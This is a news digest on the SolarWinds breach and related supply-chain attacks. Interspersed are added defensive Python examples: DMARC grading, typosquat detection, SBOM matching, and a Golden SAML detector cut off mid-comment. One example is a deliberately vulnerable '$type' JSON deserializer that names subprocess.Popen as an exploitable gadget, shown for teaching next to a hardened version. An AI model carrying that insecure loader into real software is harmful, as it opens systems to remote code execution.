The recent SolarWinds attack (known as Sunburst) has shone a light on the controls required after a breach, with affected organizations laser-focused on what happened and what next. But the same controls that can help remediate the risks posed by this serious supply chain threat can also help prevent or limit the effect of this and other attacks before they happen.

Ref - Accenture

_______________________________________________________________________________________

(April 1, 2021)


U.S. officials draw attention to supply chain attacks

The U.S. government is working to draw attention to supply chain vulnerabilities, an issue that received particular attention late last year after suspected Russian hackers gained access to federal agencies and private corporations by sneaking malicious code into widely used software. The NCSC said it plans to issue guidance throughout the month about how specific sectors, like health care and energy, can protect themselves.


_______________________________________________________________________________________

(April 1, 2021)


The SolarWinds hack severity perception increased over time

(ISC)² has published the results of an online survey of 303 cybersecurity professionals on the SolarWinds Orion software breach. When they first learned about it, 86% of respondents rated the breach "very" or "extremely" severe. Roughly six weeks after the incident was reported, as more details emerged, the share of respondents rating the breach "extremely severe" had risen from 51% to 55%.


_______________________________________________________________________________________

(April 1, 2021)


A report with detailed analysis of SolarWinds hacking tools

US Cyber Command and the Department of Homeland Security (DHS) are preparing to release a detailed analysis of the hacking tools used in the SolarWinds attack, which targeted multiple federal agencies and private firms last year. The report was originally scheduled to be released on Wednesday, but the DHS delayed it without explanation. However, it's still expected to be published soon.

Ref - Computing

_______________________________________________________________________________________

(April 1, 2021)


DHS chief announces cybersecurity plan in wake of SolarWinds attacks

Homeland Security Secretary Alejandro Mayorkas warned that cyber threats are coming dangerously close to threatening people’s lives as he announced a series of sprints designed to counter online attacks. The series includes 60-day sprints, each focused on the most important and most urgent priorities needed to achieve goals.

Ref - Yahoo

_______________________________________________________________________________________

(March 31, 2021)


The SolarWinds breach is a wake-up call for the security community

The next time a SolarWinds-class attack occurs, the steps toward a successful response should already be defined. That means understanding potential concentration risk, which may involve examining third-party liabilities and obligations, categorizing vendors, and mapping the scope of the larger supplier ecosystem. Once the potential sources of this risk are defined, mitigation strategies can be built into incident response plans.

Ref - Deloitte

_______________________________________________________________________________________

(March 30, 2021)


Executive order with 'a dozen' actions forthcoming after SolarWinds, Microsoft breaches

The Biden administration is working on “close to a dozen” action items to be included in an upcoming executive order meant to strengthen federal cybersecurity in the wake of two major breaches. The comments were made as the Biden administration continues to grapple with the fallout from both the recent attacks.

Ref - TheHill 

_______________________________________________________________________________________

(March 30, 2021)


Infosec community is concerned about SolarWinds hack

The perceived severity of a data breach typically spikes in the short term and fades as time passes. But according to a survey by the International Information System Security Certification Consortium, or (ISC)², the 2020 SolarWinds incident bucked that trend in the eyes of cybersecurity professionals: a month and a half after the incident was reported, the share of respondents rating the breach "extremely severe" had risen from 51% to 55%.


_______________________________________________________________________________________

(March 30, 2021)


Details about the second elusive attack targeting SolarWinds software

Details about the scope and victims of Supernova, which exploited a flaw in SolarWinds' Orion network management software, have so far been scarce. Fewer than a handful of victims are known to have been targeted, and an investigation into the breach of one of them led researchers at Secureworks to tie the Supernova attacks to a previously unknown Chinese nation-state group they dubbed "Spiral."


_______________________________________________________________________________________

(March 30, 2021)


SolarWinds breach led to distrust of software in use 

Security experts say that because enterprises cannot inspect the inner workings of the software they buy, they are at the mercy of software companies' security practices. In the SolarWinds attack, the attackers backdoored software that organizations trusted, and that software became a channel for stealing confidential information. This breach of trust is significant because software underpins everything the technology industry does.


_______________________________________________________________________________________

(March 30, 2021)


Trump administration emails were compromised in SolarWinds breach

An Associated Press report found that the head of DHS and the department's cyber-security staff were among the accounts exposed during the SolarWinds hack. Email accounts belonging to members of the Trump administration's Department of Homeland Security, including the head of the department, were reportedly compromised by suspected Russian hackers, according to the report.

Ref - Yahoo

_______________________________________________________________________________________

(March 29, 2021)


Key lessons from Sunburst

The cyber domain is a realm of intense interconnectivity that underpins much of daily life and national security. The discovery late in 2020 that Sunburst malware had infected not only thousands of private networks but also US government agencies led some observers to embrace alarmist views of the event as the first step in a full-fledged cyberwar.


_______________________________________________________________________________________

(March 29, 2021)


PHP's Git server hacked in a recent supply chain attack

In the latest software supply chain attack, the official PHP Git repository was hacked and the code base tampered with. Two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server. The threat actors had signed off on these commits as if these were made by known PHP developers and maintainers, Rasmus Lerdorf and Nikita Popov.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds breach got emails of top DHS officials

Suspected Russian hackers gained access to email accounts belonging to the Trump administration's head of the Department of Homeland Security and to members of the department's cybersecurity staff whose jobs included hunting threats from foreign countries. The intelligence value of the hacking of then-acting Secretary Chad Wolf and his staff is not publicly known.

Ref - AP News

_______________________________________________________________________________________

(March 29, 2021)


Need of a new alert system for cybersecurity

America needs a national cyber vulnerability early warning center after the recent SolarWinds breach. Just as a meteorologist is constantly on the lookout for storm systems, an early warning center would search widely used software and hardware components for vulnerabilities. It would discover new weaknesses before opponents, fortifying defenses and increasing the costs of mounting an attack.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds patches four new vulnerabilities in the Orion platform

SolarWinds has released fixes for four new vulnerabilities in the Orion Platform, the most severe of which is an authenticated remote code execution flaw caused by unsafe JSON deserialization. The fixes ship in Orion Platform 2020.2.5.

Ref - Rapid7 

_______________________________________________________________________________________

(March 26, 2021)


SolarWinds hackers copied a limited number of source code repositories - Mimecast

A forensic investigation conducted by Mimecast and FireEye Mandiant incident response division found that SolarWinds hackers downloaded a limited number of the company’s source code repositories.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 26, 2021)


Software security is the top priority - SolarWinds CEO

SolarWinds has launched a Secure by Design initiative in response to the recent cybersecurity attack. This project is designed to build security into the design phase of software development and to make security an ongoing priority instead of an after-the-fact priority. The company is testing a design process that uses several parallel build chains simultaneously to create software instead of just one. 

Ref - TechRepublic 

_______________________________________________________________________________________

(March 26, 2021)


Lessons learned from the SolarWinds breach

A system like SolarWinds should have security checks built in from the start and the use of software signing keys should always be closely monitored. In addition, organizations need to adopt a zero-trust policy, stay vigilant, and create a security culture to prevent complex attacks like this.

Ref - Forbes

_______________________________________________________________________________________

(March 25, 2021)


Strategies to guard against email fraud in supply chain

Proofpoint has provided six recommendations to protect supply chain relationships: knowing who the suppliers are, considering the "spider web," creating more vendor accountability, being responsive to security-conscious users, relying more on automation, and finally implementing DMARC at the gateway.
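
The last of those recommendations, DMARC at the gateway, is only as good as the published record. The block below is an added example, not Proofpoint's code or anything from the page: it parses a DMARC TXT record and lists the ways it falls short of a reject-everything posture (monitoring-only policy, partial percentage, weaker subdomain policy, no aggregate reporting). The records are constructed strings; in real use they would come from a TXT lookup of _dmarc.<domain>.

```python
"""Parse and grade a DMARC TXT record. Added example; the sample records are constructed."""

# Policy strength ordering for the p= and sp= tags (RFC 7489).
POLICY_RANK = {"none": 0, "quarantine": 1, "reject": 2}


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict, enforcing the required v= and p= tags."""
    parts = [p.strip() for p in record.split(";") if p.strip()]
    if not parts or parts[0].replace(" ", "") != "v=DMARC1":
        raise ValueError("record must start with v=DMARC1")
    tags = {}
    for part in parts:
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("p") not in POLICY_RANK:
        raise ValueError("p= tag missing or not one of none/quarantine/reject")
    if tags.get("sp", tags["p"]) not in POLICY_RANK:
        raise ValueError("sp= tag must be one of none/quarantine/reject")
    return tags


def assess_dmarc(tags: dict) -> list:
    """Return human-readable weaknesses; an empty list means p=reject everywhere with reporting."""
    issues = []
    p = tags["p"]
    if p == "none":
        issues.append("p=none: failing mail is only monitored, never quarantined or rejected")
    elif p == "quarantine":
        issues.append("p=quarantine: spoofed mail still reaches users' spam folders")
    pct = int(tags.get("pct", "100"))
    if pct < 100:
        issues.append(f"pct={pct}: the policy is applied to only {pct}% of failing mail")
    sp = tags.get("sp", p)  # subdomain policy defaults to p
    if POLICY_RANK[sp] < POLICY_RANK[p]:
        issues.append(f"sp={sp}: subdomains get a weaker policy than the organizational domain")
    if "rua" not in tags:
        issues.append("no rua=: without aggregate reports, spoofing of this domain goes unseen")
    return issues


# Constructed sample records, not real domains' DNS data.
SAMPLES = {
    "monitor-only": "v=DMARC1; p=none; rua=mailto:dmarc@example.com",
    "enforced":     "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc@example.com",
    "half-hearted": "v=DMARC1; p=reject; sp=none; pct=50",
}

if __name__ == "__main__":
    for label, record in SAMPLES.items():
        print(label, assess_dmarc(parse_dmarc(record)) or ["ok"])
```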


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds breach - Key learnings

Security experts identified several critical lessons from the SolarWinds breach: threat hunting and threat intelligence built on artificial intelligence and machine learning; comprehensive detection with real-time continuous monitoring; a simplified incident response infrastructure capable of detecting attacks, containing the damage, and restoring systems and data; agile, integrated, and automated security technology; and dynamic remediation strategies designed to quickly return business operations to a trusted state.

Ref - OpenText

_______________________________________________________________________________________

(March 25, 2021)


Fed breach disclosure rule after SolarWinds breach

An executive order in the wake of the SolarWinds hack will require software vendors and service providers to notify their U.S. government clients if they experience a security breach. Major software companies like Microsoft and Salesforce that sell to the government would be affected by the executive order.

Ref - CRN

_______________________________________________________________________________________

(March 25, 2021)


Fresh code execution flaws in the Solarwinds Orion platform

SolarWinds has shipped a security update fixing at least four documented vulnerabilities, including a pair of bugs that can be exploited for remote code execution. The patches are part of a broader security hardening of the Orion Platform, the same SolarWinds product that was compromised in the recent nation-state software supply chain attack.
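
The Orion update described here and in the March 29 entry above fixes, among other things, an authenticated remote code execution bug rooted in JSON deserialization. The block below is an added illustration, not SolarWinds code and not a reproduction of the actual Orion flaw: it models the general weakness class in Python. A payload that names the type to instantiate (a "$type" key, the way .NET's Json.NET behaves with TypeNameHandling enabled) lets any authenticated caller choose an arbitrary loadable class and hand it constructor arguments. The Node and Alert dataclasses, the payloads and the allow-list are all assumptions made for the example.

```python
"""Polymorphic JSON deserialization: naive type resolution vs. an allow-list.

Added example (not from the page, not SolarWinds code). Node and Alert are
hypothetical domain classes standing in for a product's own types; the JSON
payloads are constructed.
"""
import importlib
import json
from dataclasses import dataclass, fields


@dataclass
class Node:
    hostname: str
    ip: str


@dataclass
class Alert:
    node: Node
    severity: int


def _naive_resolve(type_name: str):
    """Resolve 'module.Class' by importing it; bare names are taken from this module.

    This is the dangerous part: the string comes straight from the request body.
    """
    module_name, _, cls_name = type_name.rpartition(".")
    if module_name:
        return getattr(importlib.import_module(module_name), cls_name)
    return globals()[cls_name]


def naive_load(text: str):
    """Vulnerable loader: trusts "$type" from the wire, so any importable class works."""
    def hook(obj: dict):
        if "$type" in obj:
            cls = _naive_resolve(obj.pop("$type"))
            return cls(**obj)  # the caller controls both the class and its kwargs
        return obj
    return json.loads(text, object_hook=hook)


# Hardened variant: the wire format may only name these classes, by short name.
ALLOWED_TYPES = {"Node": Node, "Alert": Alert}


def safe_load(text: str):
    """Only instantiates allow-listed dataclasses, and only with their declared fields."""
    def hook(obj: dict):
        if "$type" in obj:
            name = obj.pop("$type")
            cls = ALLOWED_TYPES.get(name)
            if cls is None:
                raise ValueError(f"type not permitted: {name!r}")
            expected = {f.name for f in fields(cls)}
            if set(obj) != expected:
                raise ValueError(f"{name}: got fields {sorted(obj)}, expected {sorted(expected)}")
            return cls(**obj)
        return obj
    return json.loads(text, object_hook=hook)


def is_rejected(loader, text: str) -> bool:
    """True when the loader refuses the payload with ValueError."""
    try:
        loader(text)
        return False
    except ValueError:
        return True


# Constructed payloads. The hostile one is deliberately harmless (it builds a
# fractions.Fraction); a real attacker names a type whose constructor has side
# effects, for example subprocess.Popen with an "args" key.
LEGIT = ('{"$type": "Alert", "severity": 3, '
         '"node": {"$type": "Node", "hostname": "core-sw1", "ip": "10.0.0.1"}}')
HOSTILE = '{"$type": "fractions.Fraction", "numerator": 22, "denominator": 7}'
GADGET = "subprocess.Popen"  # what the naive resolver happily hands back

if __name__ == "__main__":
    print("naive, legit  :", naive_load(LEGIT))
    print("naive, hostile:", naive_load(HOSTILE))          # attacker-chosen class instantiated
    print("naive resolves:", _naive_resolve(GADGET))        # would launch a process if instantiated
    print("safe,  legit  :", safe_load(LEGIT))
    print("safe,  hostile:", "rejected" if is_rejected(safe_load, HOSTILE) else "accepted")
```

The fix is not a smarter blocklist of dangerous types but a closed set of permitted ones, plus rejection of unexpected fields so that a permitted type cannot be driven through an unintended constructor path. The same shape applies to any deserializer that lets the document pick the class, in any language.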


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds making changes in the build process after the hack

SolarWinds’ chief executive said the software provider made a series of changes to its build process and board room reporting structure in an effort to prevent another supply chain attack like the one experienced by the company. The company is also taking a series of actions designed to boost the profile of cybersecurity in business decisions and increase the autonomy of its chief information security officer and CIO shops.

Ref - SC Media

_______________________________________________________________________________________

(March 25, 2021)


Some powerful tactics to prevent supply chain attacks

UpGuard recommends several defensive tactics that organizations can implement to significantly reduce the likelihood of a supply chain attack: deploying honeytokens, securing privileged access management, implementing a zero-trust architecture, and adopting an assume-breach mindset when planning the security strategy.

Ref - Upguard 

_______________________________________________________________________________________

(March 25, 2021)


‘Trust no one’ becomes cyber mantra after massive hacking attacks

In the wake of two massive cyberattacks that exposed glaring deficiencies in U.S. defenses, government officials and cybersecurity practitioners are saying zero-trust may be the way to stop the cyber mayhem. Zero-trust reduces or prevents lateral movement and privilege escalation.

Ref - JapanTimes 

_______________________________________________________________________________________

(March 24, 2021)


Securing the software development build using secure design

SolarWinds SVP, Engineering Lee McClendon, KPMG Director of Cyber Security Services Caleb Queern, and Head Geek Thomas LaRock provide insights on how SolarWinds is prioritizing security in its software build environment, and what the entire industry can learn about next-generation software development.

Ref - SolarWinds 

_______________________________________________________________________________________

(March 24, 2021)


SolarWinds attack and other threats indicate increased nation-state activity

Cyber attacks launched by nation-states are becoming more proficient and aggressive. This was the message from Admiral (ret.) Michael S. Rogers at the NetDiligence Cyber War Webinar Series. He said that the breadth of activity has changed with the SolarWinds attack disclosed in December 2020 and the attack on Microsoft Exchange this month, both arguably evidence of increased nation-state activity.

Ref - Yahoo

_______________________________________________________________________________________

(March 23, 2021)


Attackers can abuse OAuth authentication apps used in the SolarWinds breach

Given the broad permissions they can hold over core cloud applications, OAuth apps have become a growing attack surface and vector. Attackers use various methods to abuse OAuth apps, including compromising app certificates, a technique also seen in the SolarWinds / Solorigate campaign. With OAuth access an attacker can compromise and take over cloud accounts, and because the access token is independent of the user's password and MFA, the attacker keeps persistent access to the user's account and data until the token is explicitly revoked. 


_______________________________________________________________________________________

(March 23, 2021)


SolarWinds breach is one of the most challenging hacking incidents

The recent SolarWinds Senate hearing and a flurry of subsequent briefings have raised new questions about the attack. The acting director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Brandon Wales, has called it the most complex and challenging hacking incident the agency has come up against.

Ref - CyberArk

_______________________________________________________________________________________

(March 23, 2021)


Microsoft proposes incentivizing digital solutions to mitigate supply chain risk

The first step in strengthening supply chain security is to carefully identify the risks. Once those risks are identified, the industry can then work with the government to define risk-mitigating best practices and tailored technology-enabled solutions. Technology may not eliminate the need for more traditional restrictive measures in all contexts. But in many areas, technology-enabled solutions can both strengthen security and sustain tech leadership.

Ref - Microsoft  

_______________________________________________________________________________________

(March 22, 2021)


The ‘Frankencloud’ model is the biggest security risk

According to a researcher, information technology environments have evolved into a "Frankenstein" approach: firms scrambled to take advantage of the cloud while maintaining their existing systems of record, leaving environments riddled with complexity and disconnected parts stitched together.

Ref - TechCrunch

_______________________________________________________________________________________

(March 22, 2021)


The SolarWinds victims are now solidified

Brandon Wales, the acting director of the Cybersecurity and Infrastructure Security Agency, said that the list of victims from the attack on SolarWinds Orion has "solidified" and he is not expecting many more organizations to come forward. CISA is continuing to work with federal agencies to understand if any have been compromised.

Ref - FCW

_______________________________________________________________________________________

(March 22, 2021)


A report about SilverFish cyber-espionage group

The PRODAFT Threat Intelligence Team has published a report that gives an unusually clear look at the size and structure of organized cybercrime. It uncovered a global campaign that uses modern management methods and sophisticated tooling, including its own malware testing sandbox, and that has strong ties to the SolarWinds attack, the EvilCorp group, and other well-known malware campaigns.


_______________________________________________________________________________________

(March 22, 2021)


Shell is another victim of the Accellion supply chain hack

Energy giant Shell has disclosed a data breach, the result of a supply chain attack, after attackers compromised the company's secure file-sharing system, which runs on Accellion's File Transfer Appliance (FTA). Upon learning of the incident, Shell addressed the vulnerabilities with its service provider and cybersecurity team and began an investigation to determine the nature and extent of the incident.


_______________________________________________________________________________________

(March 22, 2021)


The new insider threat of compromised partners

The current rash of financial fraud and supply chain attacks exploits a seemingly unsolvable weakness in security strategy. Attackers exploit the fact that a firm must communicate with its outside partners and vendors to thrive as a company or an institution. Every interaction with a partner opens a door to exploitation, specifically in the form of supply chain attacks. These attacks are tremendously hard to detect since neither malware nor malicious links are necessary for successful exfiltration.


_______________________________________________________________________________________

(March 22, 2021)


Three vulnerabilities exposed during SolarWinds attack

The SolarWinds attackers leveraged three key weaknesses in the current IT ecosystem. They exploited the supply chain, injecting malware into the supplier's build pipeline so that it reached customers' core networks through a trusted, signed update. They then abused single sign-on, forging SAML tokens with a stolen signing key, which also let them sidestep traditional multifactor authentication since a forged assertion simply claims that MFA already took place.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 22, 2021)


In wake of SolarWinds, Exchange attacks, the U.S. government calls for better information sharing

The new cybersecurity leadership in the Biden White House is brainstorming methods to establish new early warning systems that combine traditional intelligence agency methods with private sector expertise. Reportedly chief among the new approaches is establishing more profound information-sharing methods with the private sector.

Ref - CSO Online 

_______________________________________________________________________________________

(March 22, 2021)


KPMG advisory on SolarWinds attack

According to the recent KPMG advisory, each piece of malware used in the SolarWinds attack had a tactical purpose. SUNSPOT was designed by the threat actor(s) to function specifically within SolarWinds' software build environment and insert a malicious backdoor called SUNBURST into the product. TEARDROP and RAINDROP were designed to deploy a modified version of Cobalt Strike. SUNSHUTTLE/GoldMax, GoldFinder, and Sibot are malicious tools reported to have been used by the threat actor(s) in environments where a SUNBURST compromise already existed.

Ref - KPMG

_______________________________________________________________________________________

(March 21, 2021)

How to prevent supply chain attacks?

The key to mitigating supply chain security risk is to ensure that each third-party vendor meets strict cybersecurity standards, whether or not regulators require it. Complacency is the main reason organizations remain exposed to supply chain attacks. To keep third-party vendors accountable, send them security questionnaires on a regular basis so that their security posture is continuously scrutinized.

Ref - UpGuard

_______________________________________________________________________________________

(March 21, 2021)


CISA releases a tool to detect SolarWinds malicious activity

The U.S. CISA has released a new tool, the CISA Hunt and Incident Response Program (CHIRP), for detecting malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise environments. It is a forensics collection tool that CISA developed to help network defenders find IOCs associated with the activity detailed in CISA's related alerts on the campaign.


_______________________________________________________________________________________

(March 20, 2021)


SolarWinds is a major disaster in the modern era of computing

Researcher Davi Ottenheimer has compared the SolarWinds attack with a Dust Bowl disaster. According to him, Microsoft for so many years worked on an extremely expedited model with minimal security or ecosystem investment inviting a predictable disaster.


_______________________________________________________________________________________

(March 20, 2021)


A Swiss firm has accessed servers of a SolarWinds hacker

A Swiss cybersecurity firm says it has accessed servers used by a hacking group (SilverFish) tied to the SolarWinds breach, revealing details about who the attackers targeted and how they carried out their operation. The firm, PRODAFT, also said the hackers have continued their campaign through this month.

Ref - PRODAFT

_______________________________________________________________________________________

(March 18, 2021)


Xcode Project spreading MacOS malware to Apple developers

Cybercriminals are targeting Apple developers with a trojanized Xcode project, which once launched installs a backdoor that has spying and data exfiltration capabilities. The malicious Xcode project, which researchers call XcodeSpy, installs a variant of the known EggShell backdoor on the developer’s macOS computer. 


_______________________________________________________________________________________

(March 18, 2021)


CISA releases detection tool for SolarWinds malicious activity 

The Cybersecurity and Infrastructure Security Agency (CISA) has released a new tool to detect post-compromise malicious activity associated with the SolarWinds hackers in on-premises enterprise environments. CISA Hunt and Incident Response Program (CHIRP), the new forensics collection tool, is a Python-based tool that helps detect SolarWinds malicious activity IOCs on Windows operating systems.


_______________________________________________________________________________________

(March 18, 2021)

SolarWinds-linked threat group SilverFish took advantage of enterprise victims

Swiss cybersecurity firm PRODAFT said that SilverFish, a threat group, has been responsible for intrusions at over 4,720 private and government organizations, including Fortune 500 companies, ministries, airlines, defense contractors, audit and consultancy companies, and automotive manufacturers. SilverFish has been connected to the recent SolarWinds breach as "one of many" threat groups taking advantage of the situation.

Ref - ZDNet

_______________________________________________________________________________________

(March 18, 2021)


Beware the Package Typosquatting Supply Chain Attack

Attackers are mimicking the names of existing packages on public registries in the hope that users or developers will accidentally download a malicious package instead of the legitimate one. A typosquatted name typically differs from the real one by a single transposed, dropped, or substituted character, or by a swapped separator such as a hyphen for an underscore, so a mistyped install command or a hastily copied dependency line pulls in the attacker's code.
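
One practical control is to check requested dependency names against the names you actually mean to depend on before an install runs. The block below is an added example, not code from the page or from any registry: it normalizes names the way PyPI does (case-folding and collapsing `-`, `_` and `.`), then flags anything that is not on a known list but is either a separator-only variant of a known name or within a small Damerau-Levenshtein distance of one. The allow-list and the manifest are constructed sample data; in real use the list would be your organization's approved packages or the registry's most-downloaded names.

```python
"""Typosquat check for dependency names. Added example; sample data is constructed."""
import re
from dataclasses import dataclass

# Constructed allow-list standing in for "packages we actually depend on".
KNOWN_PACKAGES = {"requests", "urllib3", "numpy", "python-dateutil", "pyyaml", "cryptography"}


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, adjacent transposition."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]


def normalize(name: str) -> str:
    """PEP 503 normalization: case-fold and collapse runs of -, _ and . to a single '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


@dataclass
class Finding:
    requested: str
    lookalike: str
    reason: str


def check_manifest(requested: list, known=KNOWN_PACKAGES, max_distance: int = 2) -> list:
    """Flag names that are near-misses of a known package but not the package itself."""
    findings = []
    known_norm = {normalize(k): k for k in known}
    for name in requested:
        n = normalize(name)
        if n in known_norm:
            continue  # exact match after normalization: this is the real package
        stripped = n.replace("-", "")
        for kn, original in known_norm.items():
            if kn.replace("-", "") == stripped:
                findings.append(Finding(name, original, "separator variant"))
                break
        else:
            best = min(known_norm, key=lambda k: damerau_levenshtein(n, k))
            dist = damerau_levenshtein(n, best)
            if dist <= max_distance:
                findings.append(Finding(name, known_norm[best], f"edit distance {dist}"))
    return findings


# Constructed manifest: two legitimate spellings, three look-alikes, one unrelated name.
SAMPLE_MANIFEST = ["requests", "reqeusts", "python_dateutil", "pythondateutil", "numpyy", "flask"]

if __name__ == "__main__":
    for f in check_manifest(SAMPLE_MANIFEST):
        print(f"{f.requested!r} looks like {f.lookalike!r} ({f.reason})")
```

A distance threshold of 2 is deliberately loose; tune it against your own allow-list, and treat a hit as a block, not a warning, in CI. Note that the check compares against packages you intend to use, so it catches the mistyped line but not a malicious package you chose on purpose; that case needs provenance checks on the package itself.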


_______________________________________________________________________________________

(March 18, 2021)


XcodeSpy malware can target iOS devs in a supply chain attack

A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply chain attack to install a macOS backdoor on the developer's computer. Like other development environments, it is common for developers to create projects that perform specific functions and share them online so that other developers can add them to their own applications.


_______________________________________________________________________________________

(March 18, 2021)


NSA, Homeland Security push service to mitigate cyber-attacks

The National Security Agency and the Department of Homeland Security are encouraging government agencies and high-risk companies to embrace a system known as Protective DNS, in which a private security firm would monitor and filter web traffic. PDNS blocked connections to malicious websites millions of times in a recent test involving five U.S. defense contractors.

Ref - Bloomberg
 
_______________________________________________________________________________________

(March 18, 2021)


Will the U.S. never be safe from cyberattacks?

While Washington grapples with how to prevent another attack of this scale (SolarWinds breach), the hard truth is this: There’s no such thing as a foolproof cybersecurity defense. Because human beings write computer code. And despite being incredibly smart, those people make mistakes. And each minuscule error creates one more pathway for hackers to launch cyberattacks.

Ref - Yahoo

_______________________________________________________________________________________

(March 18, 2021)


Rethinking Patch management after SolarWinds breach

The SolarWinds breach, in which hackers inserted malware into software updates sent to thousands of customers and thereby planted a backdoor in their IT systems, suggests organizations need to rethink patch management. To identify known and potential vulnerabilities, security leaders need a software bill of materials (SBOM) for the software and devices deployed in their environment, and for every new update and patch before it is applied.
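
What an SBOM buys you is a machine-readable component list that can be diffed against a vulnerability feed, for the software already deployed and for an incoming update before it is rolled out. The block below is an added example, not code from the page: it loads a minimal CycloneDX-style SBOM, strips the version from each component's package URL, and reports every component that falls inside an OSV-style affected range. The SBOM, the package names and the advisory identifiers are all constructed and describe no real package or vulnerability; in practice the SBOM comes from your build (or from the vendor with the update) and the ranges from a feed such as OSV or the NVD.

```python
"""Match SBOM components against advisory version ranges. Added example; all data is constructed."""
import json

# Constructed CycloneDX-style SBOM (only the fields this check needs).
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "library", "name": "acme-logger", "version": "1.4.1",
     "purl": "pkg:npm/acme-logger@1.4.1"},
    {"type": "library", "name": "fastjsonx", "version": "2.9.10.4",
     "purl": "pkg:maven/com.example/fastjsonx@2.9.10.4"},
    {"type": "library", "name": "leftpadx", "version": "1.0.0",
     "purl": "pkg:npm/leftpadx@1.0.0"}
  ]
}
"""

# Constructed advisories with made-up identifiers. A package is affected from
# "introduced" up to, but not including, "fixed"; fixed=None means no fix yet.
ADVISORIES = [
    {"id": "EXAMPLE-2021-0001", "purl": "pkg:npm/acme-logger",
     "introduced": "1.0.0", "fixed": "1.4.3"},
    {"id": "EXAMPLE-2021-0002", "purl": "pkg:maven/com.example/fastjsonx",
     "introduced": "2.9.0", "fixed": "2.9.10.4"},
    {"id": "EXAMPLE-2021-0003", "purl": "pkg:npm/leftpadx",
     "introduced": "0.9.0", "fixed": None},
]


def parse_version(version: str) -> tuple:
    """Dotted numeric versions only ("2.9.10.4" -> (2, 9, 10, 4)).

    Real feeds need ecosystem-specific comparators (semver pre-releases, Maven
    qualifiers, Debian epochs); this is the assumption that keeps the example short.
    """
    return tuple(int(part) for part in version.split("."))


def is_affected(version: str, advisory: dict) -> bool:
    """True when introduced <= version < fixed (or no fix exists yet)."""
    v = parse_version(version)
    if v < parse_version(advisory["introduced"]):
        return False
    fixed = advisory.get("fixed")
    return fixed is None or v < parse_version(fixed)


def match_sbom(sbom_text: str, advisories: list) -> list:
    """Return (component name, version, advisory id, fixed version) for every hit."""
    bom = json.loads(sbom_text)
    hits = []
    for comp in bom.get("components", []):
        base, _, _ = comp.get("purl", "").partition("@")  # drop the @version suffix
        for adv in advisories:
            if adv["purl"] == base and is_affected(comp["version"], adv):
                hits.append((comp["name"], comp["version"], adv["id"], adv.get("fixed")))
    return hits


if __name__ == "__main__":
    for name, version, adv_id, fixed in match_sbom(SBOM_JSON, ADVISORIES):
        print(f"{name}@{version}: {adv_id} (fixed in {fixed or 'no fix yet'})")
```

Run the same function over the SBOM of an incoming patch before deployment: a vendor update that introduces a newly affected component is exactly the case the text argues patch management has been missing.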


_______________________________________________________________________________________

(March 17, 2021)


Zero-trust helped Splunk dodge supply chain attack

Events like the SolarWinds breach are reminders of how important it is for organizations, especially high-profile organizations in industry and government, to have a zero-trust architecture in place. Many organizations are building out an in-depth set of data analytics capabilities as part of a broader zero-trust strategy, and then using those capabilities to improve visibility and security operations.


_______________________________________________________________________________________

(March 17, 2021)


SolarWinds attackers gained access to Mimecast’s production environment

Mimecast acknowledged that the threat actor responsible for the SolarWinds attack used the supply chain compromise to gain entry to a part of Mimecast’s production grid environment, accessing certain Mimecast-issued certificates and related customer-server-connection information.

Ref - SC Media

_______________________________________________________________________________________

(March 17, 2021)


Lawmakers drilled multiple agencies for SolarWinds attack

The bipartisan leaders of a House panel drilled multiple agencies for updates on the SolarWinds hack, a mass cyber campaign that compromised at least nine federal agencies and 100 private sector groups. Members of the Energy and Commerce Committee sent letters demanding answers to the leaders of the departments of Commerce, Energy, Health and Human Services, as well as the Environmental Protection Agency.

Ref - The Hill

_______________________________________________________________________________________

(March 17, 2021)


Spotting APT Activity associated with SolarWinds and Active Directory/M365 Compromise

CISA has released a table of tactics, techniques, and procedures used by the advanced persistent threat (APT) actor involved in the recent SolarWinds and Active Directory/M365 compromise. The table maps the APT's TTPs to the MITRE ATT&CK framework and includes detection recommendations, to assist network defenders in detecting and responding to this activity.

Ref - CISA

_______________________________________________________________________________________

(March 17, 2021)


Key takeaways for security admins from SolarWinds attacks

Security and IT admins can take note of several key points regarding supply chain attacks. Many potential supply chain attack victims lack the tooling to see what their vendors' software is doing inside their networks. The Golden SAML technique let the attackers forge SAML tokens for any user with the stolen token-signing certificate of the on-premises federation server, jumping from on-premises systems to cloud services and bypassing MFA entirely, because the cloud side trusts whatever the federation server signs. That exposes a weakness in current federated authentication designs.

Ref - CSO Online 
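The defensive counterpart to the Golden SAML point above is correlation: every token the cloud identity provider accepts from a federated domain should have been signed by the on-premises federation server, so a token with no issuance record there, or with a validity window far longer than the server is configured to issue, is a forgery candidate. The script below is an added example written for this page, not CSO Online's or any vendor's code. Both log formats are constructed, and the premise that the cloud-side sign-in log exposes the SAML assertion ID is an assumption made for the illustration.

```python
# Added example (not from the page or any vendor): correlate cloud-side
# federated sign-ins with the on-prem federation server's issuance log.
# A Golden SAML token is signed with a stolen token-signing key and never
# passes through the federation server, so it has no issuance record.
# Both log formats are constructed; exposing the assertion ID in the
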